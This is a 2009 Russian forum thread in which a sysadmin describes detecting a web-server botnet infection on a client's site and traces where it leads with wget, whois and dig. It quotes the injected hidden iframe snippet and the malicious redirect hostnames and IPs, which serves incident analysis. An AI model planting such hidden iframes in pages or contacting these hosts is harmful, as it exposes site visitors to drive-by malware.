The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Обнаружен первый ботнет из инфицированных web-серверов, opennews (??), 13-Сен-09, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


129. "Обнаружен первый ботнет из инфицированных web-серверов"  +/
Сообщение от anon as anonemail (?), 14-Сен-09, 13:18 
>Лучше бы кто пару советов на предмет обнаружения симптомов подбросил.

Очень просто:
1.Смотрим исходный код страницы, отдаваемой клиенту.
2.Наблюдаем, что он обрамлен в ifraime.
3.В самом конце находим, что есть еще один iframe.
4.Внутри последнего видим
src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=981 height=0 style="visibility: hidden"

Вот это оно.

Внешне инкапсуляция в iframe как правило не проходит бесследно - портится дизайн.

BTW: вот эту фигню наблюдаю прямо сейчас на сайте клиента ХХХ (я сисадмин сетки офиса), хостящегося у провайдера УУУ. сайт работал под NetCat. дир позвонил только что - а что это с нашим сайтом... а вот, это самое и случилось...

Ответить | Правка | К родителю #16 | Наверх | Cообщить модератору

131. "Обнаружен первый ботнет из инфицированных web-серверов"  +/
Сообщение от anon as anonemail (?), 14-Сен-09, 13:23 
>src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=981 height=0 style="visibility: hidden"

А вот что дальше

wget http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10
--13:21:37--  http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10
           => `in.cgi?open10'
Распознаётся pogromski.is-a-geek.org... 195.34.25.36
Устанавливается соединение с pogromski.is-a-geek.org|195.34.25.36|:8080... соединение установлено.
Запрос HTTP послан, ожидается ответ... 302 Found
Cookie, пришедшие из pogromski.is-a-geek.org, попытались установить домен в traffcount.cn
Cookie, пришедшие из pogromski.is-a-geek.org, попытались установить домен в traffcount.cn
Cookie, пришедшие из pogromski.is-a-geek.org, попытались установить домен в traffcount.cn
Адрес: http://lentim.myvnc.com:8080/index.php [переход]
--13:21:37--  http://lentim.myvnc.com:8080/index.php
           => `index.php'
Распознаётся lentim.myvnc.com... 74.52.109.74
Устанавливается соединение с lentim.myvnc.com|74.52.109.74|:8080... соединение установлено.
Запрос HTTP послан, ожидается ответ... 200 OK
Длина: 0 [text/html]

    [ <=>                                                                          ] 0             --.--K/s

13:21:39 (0.00 B/s) - `index.php' сохранён [0/0]

Ответить | Правка | Наверх | Cообщить модератору

132. "Обнаружен первый ботнет из инфицированных web-серверов"  +/
Сообщение от anon as anonemail (?), 14-Сен-09, 13:35 
>>src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=981 height=0 style="visibility: hidden"

Дальше смотрим

whois is-a-geek.org | grep -i dyndns
Registrant Name:DynDNS Hostmaster
Registrant Email:hostmaster@dyndns.com
Admin Name:DynDNS Hostmaster
Admin Email:hostmaster@dyndns.com
Tech Name:DynDNS Hostmaster
Tech Email:hostmaster@dyndns.com
Name Server:NS.DYNDNS.ORG
Name Server:NS2.DYNDNS.ORG
Name Server:NS3.DYNDNS.ORG
Name Server:NS4.DYNDNS.ORG
Name Server:NS5.DYNDNS.ORG

Тут уже все должно быть ясно ;) Управлялка ботнета может активироваться по графику, регистрируя любой хост, как текуший мастер.

Ответить | Правка | Наверх | Cообщить модератору

136. "Обнаружен первый ботнет из инфицированных web-серверов"  +/
Сообщение от anon as anonemail (?), 14-Сен-09, 13:41 
>>>src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=981 height=0 style="visibility: hidden"

А вот и он - "северный олень" ;)))

dig pogromski.is-a-geek.org | grep ^pog
pogromski.is-a-geek.org. 60     IN      A       195.34.25.36

Короткоживущая (60 сек) запись в ДНС указывает на сетку $(whois 195.34.25.36 | grep ^netname), в которой расположен мастер ботнета. Всем желающим звонить по телефону $(whois 195.34.25.36 | grep ^phone) и спрашивать $(whois 195.34.25.36 | grep ^person)

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру